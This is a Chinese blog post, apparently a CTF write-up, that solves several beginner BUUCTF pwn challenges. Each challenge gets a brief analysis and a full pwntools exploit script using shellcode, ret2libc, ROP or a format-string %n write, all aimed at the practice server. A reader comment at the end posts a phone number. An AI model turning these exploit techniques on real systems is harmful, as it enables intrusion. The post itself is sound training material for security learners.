[CTF/Pwn] BUU入门Pwn合集2
侧边栏壁纸
  • 累计撰写 65 篇文章
  • 累计收到 3 条评论
Pwn

[CTF/Pwn] BUU入门Pwn合集2

x1n
x1n
2022-04-13 / 1 评论 / 11 阅读 / 正在检测是否收录...

ciscn_2019_n_5

image-20220410102335780.png

bss可控制, 栈溢出明显, ret2libc

image-20220410102825122.png

这可真是..啥也没有啊, 直接写shellcode都能跑吧, 练习一下布置shellcode

from pwn import *
# from LibcSearcher import *
# context.terminal = '/bin/bash'
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
# context.log_level = "debug"
# elf = ELF('')
r = remote('node4.buuoj.cn', 27600)
# r = process("./elf1")
name_addr = 0x601080
r.recvuntil('name\n')
r.sendline(asm(shellcraft.sh()))
r.recvuntil('me?\n')
payload = b'A' * 0x28 + p64(name_addr)
r.sendline(payload)
r.interactive()

others_shellcode

image-20220410103803478.png

?什么玩意, nc获得shell...

ciscn_2019_ne_5

菜单题, 两个scanf都做了限定,
image-20220410104413135.png

这里, src最长128, 但是dst只有64, 足够长了, 泄露libc回main, 再ret2libc

image-20220410111614767.png

泄露puts地址的时候发现恰好payload里有0x20, 但是scanf读不进来, 换函数试试, 发现有system, 我们尝试直接找个data段写

救命...scanf里也有\x00..

最后被指点:这里面有个"sh"字符串, 和binsh一样用.. 但是strings和IDA都不识别这么短的字符串..

from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
elf = ELF('./elf3')
sys_addr = elf.sym['system']
r = remote('node4.buuoj.cn', 29750)
# r = process("./elf3")
sh_addr = 0x080482ea
def sendLog(payload) :
    r.recvuntil('password:')
    r.sendline("administrator")
    r.recvuntil("0.Exit\n:")
    r.sendline('1')
    r.sendlineafter('info:', payload)
def transLog() :
    r.recvuntil("0.Exit\n:")
    r.sendline('4')
sendLog(b'A' * 0x4C + p32(sys_addr) + p32(0) + p32(sh_addr))
transLog()
r.interactive()

铁人三项(第五赛区)_2018_rop

image-20220411134032542.png

No Canary, 栈溢出, ret2libc, 32位

from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
elf = ELF('./elf5')
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
r = remote('node4.buuoj.cn',25135)
# r = process("./elf5")
payload = b'A' * 0x8C + p32(write_plt) + p32(main_addr) + \
    p32(1) + p32(write_got) + p32(8)
r.sendline(payload)
write_addr = u32(r.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
sys_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'A' * 0x8C + p32(sys_addr) + p32(0) + p32(binsh_addr)
r.sendline(payload)
r.interactive()

bjdctf_2020_babyrop

64位rop

image-20220411135702235.png

这..实在是没啥可说的

from pwn import *
from LibcSearcher import *
context.log_level = "debug"
# r = process("./elf6")
r = remote('node4.buuoj.cn', 29721)
elf = ELF("./elf6")

puts_plt = elf.plt['puts']
main_addr = elf.symbols['vuln']
puts_got = elf.got['puts']
pop_rdi = 0x400733
ret = 0x4004c9
r.recvuntil('story!\n')
payload = b'A' * 0x28 + \
    p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)
puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8, b'\0'))

log.info("puts_addr : " + hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload = b'A' * 0x28 + \
    p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(sys_addr)
r.sendline(payload)

r.interactive()

image-20220411140506247.png

这过于明显, 我们直接传进去一个负数就行了

image-20220411140540180

有现成的后门, 直接ROP

from pwn import *
# from LibcSearcher import *
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
# elf = ELF('')
r = remote('node4.buuoj.cn', 29042)
sys_addr = 0x400726
# r = process("./elf7")
r.recvuntil('name:\n')
r.sendline('-1')
r.recvline()
payload = b'A' * 0x18 + p64(sys_addr)
r.sendline(payload)
r.interactive()

jarvisoj_fm

image-20220411141655928

有Canary, 需要把一个bss段的值从3改成4, 格式串漏洞. 两步, 一步获取输入字符串在栈上位置, 一步%n改数

image-20220411142450278

第11个参数, x=4的话正好前面写地址后面写%11$n

from pwn import *
# from LibcSearcher import *
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
# elf = ELF('')
r = remote('node4.buuoj.cn', 28983)
# r = process("./elf8")
x_addr = 0x804A02C
payload = p32(x_addr) + b'%11$n'
r.sendline(payload)
r.interactive()

pwn2_sctf_2016

image-20220411142908663

老样子, 自己写的这个get第二个参数是unsigned的, 我们直接扔个负数进去就可以了

给了一个int 0x80, 但是不如直接ret2libc一把梭, 只能利用printf

from pwn import *
from LibcSearcher import *
context(arch = 'i386', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
elf = ELF('./elf9')
r = remote('node4.buuoj.cn', 27333)
main_addr = elf.sym['vuln']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
fmt_addr = 0x80486F8
# r = process("./elf9")
r.recvuntil('read? ')
r.sendline('-1')
payload = b'A' * 0x30 + \
    p32(printf_plt) + p32(main_addr) + p32(fmt_addr) + p32(printf_got)
r.sendline(payload)
# r.recvuntil('data!\n')
r.recvuntil('You said: ')
r.recvuntil('You said: ')
printf_addr = u32(r.recv(4))
libc = LibcSearcher('printf', printf_addr)
libc_base = printf_addr - libc.dump('printf')
sys_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
r.sendline('-1')
# log.info(sys_addr)
# log.info(binsh_addr)
payload = b'A' * 0x30 + \
    p32(sys_addr) + p32(main_addr) + p32(binsh_addr)
r.sendline(payload)
r.interactive()

本地打通了, 注意最后不能异常退出(exit(-1)也是程序正常退出), 不然会在buf里打不出来

远程不知道为什么就是打不通, 破案了, libcsercher找不到, 用buu给的libc就好了

0

评论 (1)

取消
  1. 头像
    Will
    iPhone · Safari

    17519994761 兄弟可以加个微信吗

    回复